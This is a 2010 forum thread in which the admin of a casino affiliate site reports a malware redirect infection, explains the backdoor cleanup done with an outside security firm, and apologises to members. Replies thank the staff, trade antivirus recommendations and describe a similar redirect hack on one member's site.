Affiliate Guard Dog - Malware - Action Taken

Discussion in 'General Casino Affiliate Area' started by Webzcas, Nov 3, 2010.

  1.  
    Webzcas

    Webzcas Affiliate Guard Dog Member

    Messages:
    392
    Likes Received:
    167
    Joined:
    Nov 13, 2008
    Hi all,

    As you know since the beginning of last week Affiliate Guard Dog was infected by malware, the purpose of which was to redirect visitors to the site to third party sites with download trojans.

    As I host AGD on my server and after discussing with Andy, I felt it only right and proper I update you all as to the current state of play.

    We have ascertained the site was exploited back on the 22nd October and several backdoor scripts were also left on the site at this time. With the malware payload being activated on the 24th October.

    I can confirm though from analysing the ftp logs and other backend logs, that no actual breach as such of the site occured. The malware was inserted via an injection, exploiting some code on the site.

    So what have we done to resolve this?

    It became quickly apparent that whilst restoring from the clean monthly backup of 3rd October and patching all software on the site to the latest releases was not sufficient on it's own.

    I have therefore employed the services of a third party company Sucuri.net who achieved fame for exposing weaknesses with Godaddy and Network Solutions own websites.

    Sucuri, have in the past 48 hours, performed a rigorous scan of the entire AGD site and have removed all backdoors that were uploaded by the hacker. They are also constantly monitoring the site for potential vunerabilities and more importantly any malware infections going forward.

    [​IMG]

    Click the badge above to verify.

    However, this brings us to the issue of how this attack was performed in the first place. Sucuri, currently have the logs to AGD and it's subdomains, and Andy and I are hopeful they can assist us in identifying the ip address or addresses of those responsible.

    It is possible it was a bot, but hopefully if the attacks were personal, that individual or individuals responsible have tripped up.

    On another note. I can confirm unfortunately that the virus that infected Natalie's PC, was a result of the malware on this site. The exact same trojan, took out my own netbook.

    Andy and I fully apologise for this happening. But rest assured, the site is and will continue to remain secure moving on.

    Finally if any member of AGD is au fait with weblogs and would like to put their pair of eyes over the logs, to see if they can help identify the point of attack, please PM me or Andy.

    Thanks

    Dave
     
    Last edited: Nov 3, 2010
  2.  
    inspiration

    inspiration Affiliate Guard Dog Member

    Messages:
    975
    Likes Received:
    167
    Joined:
    Feb 20, 2009
    Thanks Webzcas for taking security to a higher level hopefully these trojan things remain in the past now.

    I secured my PC with Avast + McAfee antivrus : I urge everyone to do so too because these things can happen all the at any site and you will be better protected that way.


    :)
     
  3.  
    Engineer

    Engineer Super Moderator

    Messages:
    2,443
    Likes Received:
    200
    Joined:
    Dec 14, 2006
    Thanks for the update, Dave. I hope you will be able to find whoever did this...
     
  4.  
    bonustreak

    bonustreak Administrator Staff Member

    Messages:
    3,887
    Likes Received:
    346
    Joined:
    Dec 15, 2006
    Thank you Dave and Andy for dealing with this so swiftly and vigorously!
     
  5.  
    tryme1

    tryme1 Affiliate Guard Dog Member

    Messages:
    681
    Likes Received:
    56
    Joined:
    Mar 2, 2009
    I also have the same combination of security options (although that irritating woman's voice on Avast intoning 'your virus database has been updated' drives me mad!).

    I'm glad that everything is resolved and normal scheduling has been resumed:)
     
  6.  
    SlotsOfFortune-Affiliates

    SlotsOfFortune-Affiliates Affiliate Guard Dog Member

    Messages:
    47
    Likes Received:
    0
    Joined:
    Jun 8, 2008
    Thank you for taking care of this! The virus was scary, but I am glad we are all safe now.

    Natalie.
     
  7.  
    inspiration

    inspiration Affiliate Guard Dog Member

    Messages:
    975
    Likes Received:
    167
    Joined:
    Feb 20, 2009
    Yes but they are prob the best at this time. Avast found many virusses that McAfee just could not.
     
  8.  
    Vladi

    Vladi Affiliate Guard Dog Member

    Messages:
    772
    Likes Received:
    114
    Joined:
    Feb 4, 2008
    Thanks guys, sounds like it was a nasty job trying to fix.

    And boy am i happy i have a mac ;) /runs
     
  9.  
    inspiration

    inspiration Affiliate Guard Dog Member

    Messages:
    975
    Likes Received:
    167
    Joined:
    Feb 20, 2009
    I see an error on the mainpage AGD, maybe you wanna check that file.


    Hope it is nothing to worry about.
     
  10.  
    Guard Dog

    Guard Dog Guard Dog Staff Member

    Messages:
    7,727
    Likes Received:
    1,152
    Joined:
    Dec 13, 2006
    No, nothing to worry about. It is simply a missing banner.. The banner system was in one location and was hacked (a long time ago) and was removed in it's entirety. As a result there is a 404 error when trying to retrieve the banner.

    Will fix :) thanks for the reminder
     
  11.  
    Baccarat

    Baccarat Affiliate Guard Dog Member

    Messages:
    74
    Likes Received:
    0
    Joined:
    Feb 15, 2010
    Everyone should download Malware Bytes. It detects malware instantly on your computer and can remove it. I got infected a year ago from clicking on a pop-up banner and had to use this software.

    Glad to see AGD is back in good health =).
     
  12.  
    lots0

    lots0 Affiliate Guard Dog Member

    Messages:
    595
    Likes Received:
    2
    Joined:
    Sep 17, 2009
    Hi guys,

    Thanks for the info on Sucuri.net.

    One of my sites got hit by a redirect injection too.

    Perdy damn sneeky. It is redirecting to p0rn sites after a page closes in my CMS.

    Got the CMS shut down right now, to clean it out. Looks like they hit me around the 25th of October.
     
  13.  
    lots0

    lots0 Affiliate Guard Dog Member

    Messages:
    595
    Likes Received:
    2
    Joined:
    Sep 17, 2009
    the one that got me was "tizer.js" and some cross scripting holes, that just got closed...
     
  14.  
    Corgi

    Corgi Affiliate Guard Dog Member

    Messages:
    15
    Likes Received:
    0
    Joined:
    Jul 1, 2010
    What a bummer! Man it sucks that people want to ruin a good community like this, but am glad you all have resolved everything. I guess that is the way of the world, especially when you are reporting the facts and keeping affiliates informed. I am sure there are a lot of blacklisted sites that would love to take this site down.....

    Keep up the good fight.
     
  15.  
    bc518

    bc518 Affiliate Guard Dog Member

    Messages:
    51
    Likes Received:
    0
    Joined:
    Nov 29, 2008
    Was the forum system vBulletin exploited? It seems every forum system has some bugs like any OS.
     

Share This Page